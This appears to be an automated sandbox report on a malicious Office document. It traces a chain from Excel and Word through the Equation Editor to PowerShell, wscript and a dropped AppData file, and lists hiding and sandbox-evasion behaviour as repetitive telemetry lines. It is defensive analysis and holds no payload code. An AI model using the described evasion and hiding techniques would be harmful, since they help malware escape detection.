            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: EADD419E.doc.4.drJump to dropped file
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXESection loaded: netapi32.dll and davhlpr.dll loadedJump to behavior
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\dagifhdJump to dropped file
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\dagifhdJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\dagifhd:Zone.Identifier read attributes | deleteJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_00083862 GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep,22_2_00083862
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dagifhdProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dagifhdProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dagifhdProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dagifhdProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dagifhdProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dagifhdProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dagifhdProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dagifhdProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dagifhdProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dagifhdProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dagifhdProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: 40830001.xlsStream path 'Workbook' entropy: 7.99935437344 (max. 8.0)
            Source: 96630000.0.drStream path 'Workbook' entropy: 7.99934388438 (max. 8.0)
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

            Malware Analysis System Evasion

            barindex
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDEJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDEJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep,22_2_00083862
